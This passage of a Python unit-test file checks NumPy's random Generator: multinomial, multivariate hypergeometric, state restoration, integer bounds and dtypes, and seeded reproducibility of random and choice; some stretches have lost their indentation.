        assert_(np.all(-5 <= draws))
        assert_(np.all(draws < -1))

    def test_size(self):
        # gh-3173
        p = [0.5, 0.5]
        for _ in range(3):
            assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
        for size in ([2, 2], (2, 2), np.array((2, 2))):
            assert_equal(random.multinomial(1, p, size).shape, (2, 2, 2))

        assert_raises(TypeError, random.multinomial, 1, p,
                      float(1))

    def test_invalid_prob(self):
        assert_raises(ValueError, random.multinomial, 100, [1.1, 0.2])
        assert_raises(ValueError, random.multinomial, 100, [-.1, 0.9])

    def test_invalid_n(self):
        assert_raises(ValueError, random.multinomial, -1, [0.8, 0.2])
        assert_raises(ValueError, random.multinomial, [-1] * 10, [0.8, 0.2])

    def test_p_non_contiguous(self):
        # Strided pvals must give the same draws as a contiguous copy.
        probs = np.arange(15.)
        probs /= np.sum(probs[1::3])
        pvals = probs[1::3]
        gen = Generator(MT19937(1432985819))
        non_contig = gen.multinomial(100, pvals=pvals)
        gen = Generator(MT19937(1432985819))
        contig = gen.multinomial(100, pvals=np.ascontiguousarray(pvals))
        assert_array_equal(non_contig, contig)

    def test_multidimensional_pvals(self):
        # pvals must be 1-dimensional.
        for bad_pvals in ([[0, 1]], [[0], [1]], [[[0], [1]], [[1], [0]]],
                          np.array([[0, 1], [1, 0]])):
            assert_raises(ValueError, random.multinomial, 10, bad_pvals)
class TestMultivariateHypergeometric:
    """Validation, edge-case and repeatability tests for
    multivariate_hypergeometric with both the 'count' and 'marginals'
    sampling methods."""

    def setup(self):
        # nose-style setup; fixed seed used by the deterministic tests below.
        self.seed = 8675309

    def test_argument_validation(self):
        # Error cases...

        # `colors` must be a 1-d sequence
        assert_raises(ValueError, random.multivariate_hypergeometric,
                      10, 4)

        # Negative nsample
        assert_raises(ValueError, random.multivariate_hypergeometric,
                      [2, 3, 4], -1)

        # Negative color
        assert_raises(ValueError, random.multivariate_hypergeometric,
                      [-1, 2, 3], 2)

        # nsample exceeds sum(colors)
        assert_raises(ValueError, random.multivariate_hypergeometric,
                      [2, 3, 4], 10)

        # nsample exceeds sum(colors) (edge case of empty colors)
        assert_raises(ValueError, random.multivariate_hypergeometric,
                      [], 1)

        # Validation errors associated with very large values in colors.
        assert_raises(ValueError, random.multivariate_hypergeometric,
                      [999999999, 101], 5, 1, 'marginals')

        int64_info = np.iinfo(np.int64)
        max_int64 = int64_info.max
        max_int64_index = max_int64 // int64_info.dtype.itemsize
        assert_raises(ValueError, random.multivariate_hypergeometric,
                      [max_int64_index - 100, 101], 5, 1, 'count')

    @pytest.mark.parametrize('method', ['count', 'marginals'])
    def test_edge_cases(self, method):
        # Set the seed, but in fact, all the results in this test are
        # deterministic, so we don't really need this.
        random = Generator(MT19937(self.seed))

        # Zero draws always give all-zero counts.
        x = random.multivariate_hypergeometric([0, 0, 0], 0, method=method)
        assert_array_equal(x, [0, 0, 0])

        x = random.multivariate_hypergeometric([], 0, method=method)
        assert_array_equal(x, [])

        x = random.multivariate_hypergeometric([], 0, size=1, method=method)
        assert_array_equal(x, np.empty((1, 0), dtype=np.int64))

        x = random.multivariate_hypergeometric([1, 2, 3], 0, method=method)
        assert_array_equal(x, [0, 0, 0])

        # Only one color present: every draw must come from it.
        x = random.multivariate_hypergeometric([9, 0, 0], 3, method=method)
        assert_array_equal(x, [3, 0, 0])

        # Drawing every item returns exactly the color counts.
        colors = [1, 1, 0, 1, 1]
        x = random.multivariate_hypergeometric(colors, sum(colors),
                                               method=method)
        assert_array_equal(x, colors)

        x = random.multivariate_hypergeometric([3, 4, 5], 12, size=3,
                                               method=method)
        assert_array_equal(x, [[3, 4, 5]]*3)

    # Cases for nsample:
    #     nsample < 10
    #     10 <= nsample < colors.sum()/2
    #     colors.sum()/2 < nsample < colors.sum() - 10
    #     colors.sum() - 10 < nsample < colors.sum()
    @pytest.mark.parametrize('nsample', [8, 25, 45, 55])
    @pytest.mark.parametrize('method', ['count', 'marginals'])
    @pytest.mark.parametrize('size', [5, (2, 3), 150000])
    def test_typical_cases(self, nsample, method, size):
        random = Generator(MT19937(self.seed))

        colors = np.array([10, 5, 20, 25])
        sample = random.multivariate_hypergeometric(colors, nsample, size,
                                                    method=method)
        if isinstance(size, int):
            expected_shape = (size,) + colors.shape
        else:
            expected_shape = size + colors.shape
        assert_equal(sample.shape, expected_shape)
        assert_((sample >= 0).all())
        assert_((sample <= colors).all())
        # Every draw uses exactly nsample items in total.
        assert_array_equal(sample.sum(axis=-1),
                           np.full(size, fill_value=nsample, dtype=int))
        if isinstance(size, int) and size >= 100000:
            # This sample is large enough to compare its mean to
            # the expected values.
            assert_allclose(sample.mean(axis=0),
                            nsample * colors / colors.sum(),
                            rtol=1e-3, atol=0.005)

    def test_repeatability1(self):
        # Fixed seed must reproduce this exact 'count'-method table.
        random = Generator(MT19937(self.seed))
        sample = random.multivariate_hypergeometric([3, 4, 5], 5, size=5,
                                                    method='count')
        expected = np.array([[2, 1, 2],
                             [2, 1, 2],
                             [1, 1, 3],
                             [2, 0, 3],
                             [2, 1, 2]])
        assert_array_equal(sample, expected)

    def test_repeatability2(self):
        # Fixed seed must reproduce this exact 'marginals'-method table.
        random = Generator(MT19937(self.seed))
        sample = random.multivariate_hypergeometric([20, 30, 50], 50,
                                                    size=5,
                                                    method='marginals')
        expected = np.array([[ 9, 17, 24],
                             [ 7, 13, 30],
                             [ 9, 15, 26],
                             [ 9, 17, 24],
                             [12, 14, 24]])
        assert_array_equal(sample, expected)

    def test_repeatability3(self):
        # Same as above with a smaller nsample.
        random = Generator(MT19937(self.seed))
        sample = random.multivariate_hypergeometric([20, 30, 50], 12,
                                                    size=5,
                                                    method='marginals')
        expected = np.array([[2, 3, 7],
                             [5, 3, 4],
                             [2, 5, 5],
                             [5, 3, 4],
                             [1, 5, 6]])
        assert_array_equal(sample, expected)
class TestSetState:
    """Saving and restoring the bit generator's state."""

    def setup(self):
        self.seed = 1234567890
        self.rg = Generator(MT19937(self.seed))
        self.bit_generator = self.rg.bit_generator
        self.state = self.bit_generator.state
        self.legacy_state = (self.state['bit_generator'],
                             self.state['state']['key'],
                             self.state['state']['pos'])

    def test_gaussian_reset(self):
        # Make sure the cached every-other-Gaussian is reset.
        before = self.rg.standard_normal(size=3)
        self.bit_generator.state = self.state
        after = self.rg.standard_normal(size=3)
        assert_(np.all(before == after))

    def test_gaussian_reset_in_media_res(self):
        # When the state is saved with a cached Gaussian, make sure the
        # cached Gaussian is restored.
        self.rg.standard_normal()
        snapshot = self.bit_generator.state
        before = self.rg.standard_normal(size=3)
        self.bit_generator.state = snapshot
        after = self.rg.standard_normal(size=3)
        assert_(np.all(before == after))

    def test_negative_binomial(self):
        # Ensure that the negative binomial results take floating point
        # arguments without truncation.
        self.rg.negative_binomial(0.5, 0.5)
class TestIntegers:
rfunc = random.integers
# valid integer/boolean types
itype = [bool, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self, endpoint):
    """Non-integer dtypes are rejected with TypeError."""
    assert_raises(TypeError, self.rfunc, 1, endpoint=endpoint, dtype=float)
def test_bounds_checking(self, endpoint):
    """Out-of-range or inverted low/high bounds raise for every dtype."""
    for dt in self.itype:
        lbnd = 0 if dt is bool else np.iinfo(dt).min
        ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
        # With endpoint=True the upper bound is inclusive, so shift it down.
        ubnd = ubnd - 1 if endpoint else ubnd

        # Scalar bounds: below-minimum low, above-maximum high, and
        # inverted / empty ranges must all raise ValueError.
        assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd,
                      endpoint=endpoint, dtype=dt)
        assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1,
                      endpoint=endpoint, dtype=dt)
        assert_raises(ValueError, self.rfunc, ubnd, lbnd,
                      endpoint=endpoint, dtype=dt)
        assert_raises(ValueError, self.rfunc, 1, 0, endpoint=endpoint,
                      dtype=dt)

        # Same violations via array-like bounds (broadcast code path).
        assert_raises(ValueError, self.rfunc, [lbnd - 1], ubnd,
                      endpoint=endpoint, dtype=dt)
        assert_raises(ValueError, self.rfunc, [lbnd], [ubnd + 1],
                      endpoint=endpoint, dtype=dt)
        assert_raises(ValueError, self.rfunc, [ubnd], [lbnd],
                      endpoint=endpoint, dtype=dt)
        assert_raises(ValueError, self.rfunc, 1, [0],
                      endpoint=endpoint, dtype=dt)
def test_bounds_checking_array(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + (not endpoint)
assert_raises(ValueError, self.rfunc, [lbnd - 1] * 2, [ubnd] * 2,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd] * 2,
[ubnd + 1] * 2, endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, [lbnd] * 2,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [1] * 2, 0,
endpoint=endpoint, dtype=dt)
def test_rng_zero_and_extremes(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
is_open = not endpoint
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc([tgt], tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc(tgt, [tgt + is_open], size=1000,
endpoint=endpoint, dtype=dt), tgt)
tgt = (lbnd + ubnd) // 2
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc([tgt], [tgt + is_open],
size=1000, endpoint=endpoint, dtype=dt),
tgt)
def test_rng_zero_and_extremes_array(self, endpoint):
size = 1000
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
tgt = ubnd - 1
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
tgt = (lbnd + ubnd) // 2
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
def test_full_range(self, endpoint):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
try:
self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_full_range_array(self, endpoint):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
try:
self.rfunc([lbnd] * 2, [ubnd], endpoint=endpoint, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self, endpoint):
# Don't use fixed seed
random = Generator(MT19937())
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd - endpoint, size=2 ** 16,
endpoint=endpoint, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2 - endpoint, size=2 ** 16, endpoint=endpoint,
dtype=bool)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_scalar_array_equiv(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
size = 1000
random = Generator(MT19937(1234))
scalar = random.integers(lbnd, ubnd, size=size, endpoint=endpoint,
dtype=dt)
random = Generator(MT19937(1234))
scalar_array = random.integers([lbnd], [ubnd], size=size,
endpoint=endpoint, dtype=dt)
random = Generator(MT19937(1234))
array = random.integers([lbnd] * size, [ubnd] *
size, size=size, endpoint=endpoint, dtype=dt)
assert_array_equal(scalar, scalar_array)
assert_array_equal(scalar, array)
def test_repeatability(self, endpoint):
# We use a md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': 'b3300e66d2bb59e493d255d47c3a6cbe',
'int16': '39624ead49ad67e37545744024d2648b',
'int32': '5c4810373f979336c6c0c999996e47a1',
'int64': 'ab126c15edff26f55c50d2b7e37391ac',
'int8': 'ba71ccaffeeeb9eeb1860f8075020b9c',
'uint16': '39624ead49ad67e37545744024d2648b',
'uint32': '5c4810373f979336c6c0c999996e47a1',
'uint64': 'ab126c15edff26f55c50d2b7e37391ac',
'uint8': 'ba71ccaffeeeb9eeb1860f8075020b9c'}
for dt in self.itype[1:]:
random = Generator(MT19937(1234))
# view as little endian for hash
if sys.byteorder == 'little':
val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint,
dtype=dt)
else:
val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint,
dtype=dt).byteswap()
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
random = Generator(MT19937(1234))
val = random.integers(0, 2 - endpoint, size=1000, endpoint=endpoint,
dtype=bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_repeatability_broadcasting(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt in (bool, np.bool_) else np.iinfo(dt).min
ubnd = 2 if dt in (bool, np.bool_) else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
# view as little endian for hash
random = Generator(MT19937(1234))
val = random.integers(lbnd, ubnd, size=1000, endpoint=endpoint,
dtype=dt)
random = Generator(MT19937(1234))
val_bc = random.integers([lbnd] * 1000, ubnd, endpoint=endpoint,
dtype=dt)
assert_array_equal(val, val_bc)
random = Generator(MT19937(1234))
val_bc = random.integers([lbnd] * 1000, [ubnd] * 1000,
endpoint=endpoint, dtype=dt)
assert_array_equal(val, val_bc)
@pytest.mark.parametrize(
'bound, expected',
[(2**32 - 1, np.array([517043486, 1364798665, 1733884389, 1353720612,
3769704066, 1170797179, 4108474671])),
(2**32, np.array([517043487, 1364798666, 1733884390, 1353720613,
3769704067, 1170797180, 4108474672])),
(2**32 + 1, np.array([517043487, 1733884390, 3769704068, 4108474673,
1831631863, 1215661561, 3869512430]))]
)
def test_repeatability_32bit_boundary(self, bound, expected):
for size in [None, len(expected)]:
random = Generator(MT19937(1234))
x = random.integers(bound, size=size)
assert_equal(x, expected if size is not None else expected[0])
def test_repeatability_32bit_boundary_broadcasting(self):
desired = np.array([[[1622936284, 3620788691, 1659384060],
[1417365545, 760222891, 1909653332],
[3788118662, 660249498, 4092002593]],
[[3625610153, 2979601262, 3844162757],
[ 685800658, 120261497, 2694012896],
[1207779440, 1586594375, 3854335050]],
[[3004074748, 2310761796, 3012642217],
[2067714190, 2786677879, 1363865881],
[ 791663441, 1867303284, 2169727960]],
[[1939603804, 1250951100, 298950036],
[1040128489, 3791912209, 3317053765],
[3155528714, 61360675, 2305155588]],
[[ 817688762, 1335621943, 3288952434],
[1770890872, 1102951817, 1957607470],
[3099996017, 798043451, 48334215]]])
for size in [None, (5, 3, 3)]:
random = Generator(MT19937(12345))
x = random.integers([[-1], [0], [1]],
[2**32 - 1, 2**32, 2**32 + 1],
size=size)
assert_array_equal(x, desired if size is not None else desired[0])
def test_int64_uint64_broadcast_exceptions(self, endpoint):
configs = {np.uint64: ((0, 2**65), (-1, 2**62), (10, 9), (0, 0)),
np.int64: ((0, 2**64), (-(2**64), 2**62), (10, 9), (0, 0),
(-2**63-1, -2**63-1))}
for dtype in configs:
for config in configs[dtype]:
low, high = config
high = high - endpoint
low_a = np.array([[low]*10])
high_a = np.array([high] * 10)
assert_raises(ValueError, random.integers, low, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_a, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low, high_a,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_a, high_a,
endpoint=endpoint, dtype=dtype)
low_o = np.array([[low]*10], dtype=object)
high_o = np.array([high] * 10, dtype=object)
assert_raises(ValueError, random.integers, low_o, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low, high_o,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_o, high_o,
endpoint=endpoint, dtype=dtype)
def test_int64_uint64_corner_case(self, endpoint):
# When stored in Numpy arrays, `lbnd` is casted
# as np.int64, and `ubnd` is casted as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it be round down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1 - endpoint)
# None of these function calls should
# generate a ValueError now.
actual = random.integers(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self, endpoint):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
dt = np.bool_ if dt is bool else dt
sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
for dt in (bool, int, np.compat.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert not hasattr(sample, 'dtype')
assert_equal(type(sample), dt)
def test_respect_dtype_array(self, endpoint):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
dt = np.bool_ if dt is bool else dt
sample = self.rfunc([lbnd], [ubnd], endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
sample = self.rfunc([lbnd] * 2, [ubnd] * 2, endpoint=endpoint,
dtype=dt)
assert_equal(sample.dtype, dt)
def test_zero_size(self, endpoint):
# See gh-7203
for dt in self.itype:
sample = self.rfunc(0, 0, (3, 0, 4), endpoint=endpoint, dtype=dt)
assert sample.shape == (3, 0, 4)
assert sample.dtype == dt
assert self.rfunc(0, -10, 0, endpoint=endpoint,
dtype=dt).shape == (0,)
assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape,
(3, 0, 4))
assert_equal(random.integers(0, -10, size=0).shape, (0,))
assert_equal(random.integers(10, 10, size=0).shape, (0,))
def test_error_byteorder(self):
other_byteord_dt = '<i4' if sys.byteorder == 'big' else '>i4'
with pytest.raises(ValueError):
random.integers(0, 200, size=10, dtype=other_byteord_dt)
# chi2max is the maximum acceptable chi-squared value.
@pytest.mark.slow
@pytest.mark.parametrize('sample_size,high,dtype,chi2max',
[(5000000, 5, np.int8, 125.0), # p-value ~4.6e-25
(5000000, 7, np.uint8, 150.0), # p-value ~7.7e-30
(10000000, 2500, np.int16, 3300.0), # p-value ~3.0e-25
(50000000, 5000, np.uint16, 6500.0), # p-value ~3.5e-25
])
def test_integers_small_dtype_chisquared(self, sample_size, high,
dtype, chi2max):
# Regression test for gh-14774.
samples = random.integers(high, size=sample_size, dtype=dtype)
values, counts = np.unique(samples, return_counts=True)
expected = sample_size / high
chi2 = ((counts - expected)**2 / expected).sum()
assert chi2 < chi2max
class TestRandomDist:
# Make sure the random distribution returns the correct value for a
# given seed
    def setup(self):
        # Nose/pytest-style per-test hook: stores the seed every test
        # uses to build its own Generator(MT19937(self.seed)).
        # NOTE(review): newer pytest deprecates plain `setup` in favor of
        # `setup_method` — confirm the project's pytest still invokes it.
        self.seed = 1234567890
    def test_integers(self):
        """Seeded integers() reproduces a pinned sample."""
        random = Generator(MT19937(self.seed))
        actual = random.integers(-99, 99, size=(3, 2))
        desired = np.array([[-80, -56], [41, 37], [-83, -16]])
        assert_array_equal(actual, desired)
    def test_integers_masked(self):
        """Masked rejection-sampling path (uint32) reproduces pinned values."""
        # Test masked rejection sampling algorithm to generate array of
        # uint32 in an interval.
        random = Generator(MT19937(self.seed))
        actual = random.integers(0, 99, size=(3, 2), dtype=np.uint32)
        desired = np.array([[9, 21], [70, 68], [8, 41]], dtype=np.uint32)
        assert_array_equal(actual, desired)
    def test_integers_closed(self):
        """endpoint=True (closed interval) reproduces pinned values."""
        random = Generator(MT19937(self.seed))
        actual = random.integers(-99, 99, size=(3, 2), endpoint=True)
        desired = np.array([[-80, -56], [ 41, 38], [-83, -15]])
        assert_array_equal(actual, desired)
    def test_integers_max_int(self):
        """A closed bound at the maximum C long must not overflow."""
        # Tests whether integers with closed=True can generate the
        # maximum allowed Python int that can be converted
        # into a C long. Previous implementations of this
        # method have thrown an OverflowError when attempting
        # to generate this integer.
        actual = random.integers(np.iinfo('l').max, np.iinfo('l').max,
                                 endpoint=True)
        desired = np.iinfo('l').max
        assert_equal(actual, desired)
    def test_random(self):
        """Seeded random() reproduces pinned doubles; a scalar call after
        reseeding matches the first array element."""
        random = Generator(MT19937(self.seed))
        actual = random.random((3, 2))
        desired = np.array([[0.096999199829214, 0.707517457682192],
                            [0.084364834598269, 0.767731206553125],
                            [0.665069021359413, 0.715487190596693]])
        assert_array_almost_equal(actual, desired, decimal=15)
        random = Generator(MT19937(self.seed))
        actual = random.random()
        assert_array_almost_equal(actual, desired[0, 0], decimal=15)
    def test_random_float(self):
        """Seeded random() matches pinned values to 7 decimals."""
        random = Generator(MT19937(self.seed))
        actual = random.random((3, 2))
        desired = np.array([[0.0969992 , 0.70751746],
                            [0.08436483, 0.76773121],
                            [0.66506902, 0.71548719]])
        assert_array_almost_equal(actual, desired, decimal=7)
    def test_random_float_scalar(self):
        """Scalar float32 draw reproduces a pinned value."""
        random = Generator(MT19937(self.seed))
        actual = random.random(dtype=np.float32)
        desired = 0.0969992
        assert_array_almost_equal(actual, desired, decimal=7)
    def test_random_unsupported_type(self):
        """Integer dtypes are rejected by random()."""
        assert_raises(TypeError, random.random, dtype='int32')
    def test_choice_uniform_replace(self):
        """Seeded uniform choice with replacement reproduces pinned values."""
        random = Generator(MT19937(self.seed))
        actual = random.choice(4, 4)
        desired = np.array([0, 0, 2, 2], dtype=np.int64)
        assert_array_equal(actual, desired)
    def test_choice_nonuniform_replace(self):
        """Seeded weighted choice with replacement reproduces pinned values."""
        random = Generator(MT19937(self.seed))
        actual = random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
        desired = np.array([0, 1, 0, 1], dtype=np.int64)
        assert_array_equal(actual, desired)
    def test_choice_uniform_noreplace(self):
        """Seeded choice without replacement reproduces pinned values;
        shuffle=False returns the elements in order."""
        random = Generator(MT19937(self.seed))
        actual = random.choice(4, 3, replace=False)
        desired = np.array([2, 0, 3], dtype=np.int64)
        assert_array_equal(actual, desired)
        actual = random.choice(4, 4, replace=False, shuffle=False)
        desired = np.arange(4, dtype=np.int64)
        assert_array_equal(actual, desired)
    def test_choice_nonuniform_noreplace(self):
        """Seeded weighted choice without replacement reproduces pinned values."""
        random = Generator(MT19937(self.seed))
        actual = random.choice(4, 3, replace=False, p=[0.1, 0.3, 0.5, 0.1])
        desired = np.array([0, 2, 3], dtype=np.int64)
        assert_array_equal(actual, desired)
    def test_choice_noninteger(self):
        """choice() over a string array reproduces pinned values."""
        random = Generator(MT19937(self.seed))
        actual = random.choice(['a', 'b', 'c', 'd'], 4)
        desired = np.array(['a', 'a', 'c', 'c'])
        assert_array_equal(actual, desired)
    def test_choice_multidimensional_default_axis(self):
        """choice() over 2-D input picks whole rows (default axis=0)."""
        random = Generator(MT19937(self.seed))
        actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 3)
        desired = np.array([[0, 1], [0, 1], [4, 5]])
        assert_array_equal(actual, desired)
    def test_choice_multidimensional_custom_axis(self):
        """choice() with axis=1 picks whole columns."""
        random = Generator(MT19937(self.seed))
        actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 1, axis=1)
        desired = np.array([[0], [2], [4], [6]])
        assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
# gh-13087
assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
    def test_choice_return_shape(self):
        """size=None yields scalars, size=() yields 0-d arrays, tuple
        sizes yield matching shapes, and zero-size requests are valid."""
        p = [0.1, 0.9]
        # Check scalar
        assert_(np.isscalar(random.choice(2, replace=True)))
        assert_(np.isscalar(random.choice(2, replace=False)))
        assert_(np.isscalar(random.choice(2, replace=True, p=p)))
        assert_(np.isscalar(random.choice(2, replace=False, p=p)))
        assert_(np.isscalar(random.choice([1, 2], replace=True)))
        assert_(random.choice([None], replace=True) is None)
        a = np.array([1, 2])
        arr = np.empty(1, dtype=object)
        arr[0] = a
        assert_(random.choice(arr, replace=True) is a)
        # Check 0-d array
        s = tuple()
        assert_(not np.isscalar(random.choice(2, s, replace=True)))
        assert_(not np.isscalar(random.choice(2, s, replace=False)))
        assert_(not np.isscalar(random.choice(2, s, replace=True, p=p)))
        assert_(not np.isscalar(random.choice(2, s, replace=False, p=p)))
        assert_(not np.isscalar(random.choice([1, 2], s, replace=True)))
        assert_(random.choice([None], s, replace=True).ndim == 0)
        a = np.array([1, 2])
        arr = np.empty(1, dtype=object)
        arr[0] = a
        assert_(random.choice(arr, s, replace=True).item() is a)
        # Check multi dimensional array
        s = (2, 3)
        p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
        assert_equal(random.choice(6, s, replace=True).shape, s)
        assert_equal(random.choice(6, s, replace=False).shape, s)
        assert_equal(random.choice(6, s, replace=True, p=p).shape, s)
        assert_equal(random.choice(6, s, replace=False, p=p).shape, s)
        assert_equal(random.choice(np.arange(6), s, replace=True).shape, s)
        # Check zero-size
        assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
        assert_equal(random.integers(0, -10, size=0).shape, (0,))
        assert_equal(random.integers(10, 10, size=0).shape, (0,))
        assert_equal(random.choice(0, size=0).shape, (0,))
        assert_equal(random.choice([], size=(0,)).shape, (0,))
        assert_equal(random.choice(['a', 'b'], size=(3, 0, 4)).shape,
                     (3, 0, 4))
        assert_raises(ValueError, random.choice, [], 10)
    def test_choice_nan_probabilities(self):
        """Probability entries of None must raise ValueError."""
        a = np.array([42, 1, 2])
        p = [None, None, None]
        assert_raises(ValueError, random.choice, a, p=p)
    def test_choice_p_non_contiguous(self):
        """A strided (non-contiguous) p gives the same result as its
        contiguous copy."""
        p = np.ones(10) / 5
        p[1::2] = 3.0
        random = Generator(MT19937(self.seed))
        non_contig = random.choice(5, 3, p=p[::2])
        random = Generator(MT19937(self.seed))
        contig = random.choice(5, 3, p=np.ascontiguousarray(p[::2]))
        assert_array_equal(non_contig, contig)
def test_choice_return_type(self):
# gh 9867
p = np.ones(4) / 4.
actual = random.choice(4, 2)
assert actual.dtype == np.int64
actual = random.choice(4, 2, replace=False)
assert actual.dtype == np.int64
actual = random.choice(4, 2, p=p)
assert actual.dtype == np.int64
actual = random.choice(4, 2, p=p, replace=False)
assert actual.dtype == np.int64
    def test_choice_large_sample(self):
        """Large no-replacement sample matches a pinned md5 hash
        (byteswapped first on big-endian hosts)."""
        choice_hash = 'd44962a0b1e92f4a3373c23222244e21'
        random = Generator(MT19937(self.seed))
        actual = random.choice(10000, 5000, replace=False)
        if sys.byteorder != 'little':
            actual = actual.byteswap()
        res = hashlib.md5(actual.view(np.int8)).hexdigest()
        assert_(choice_hash == res)
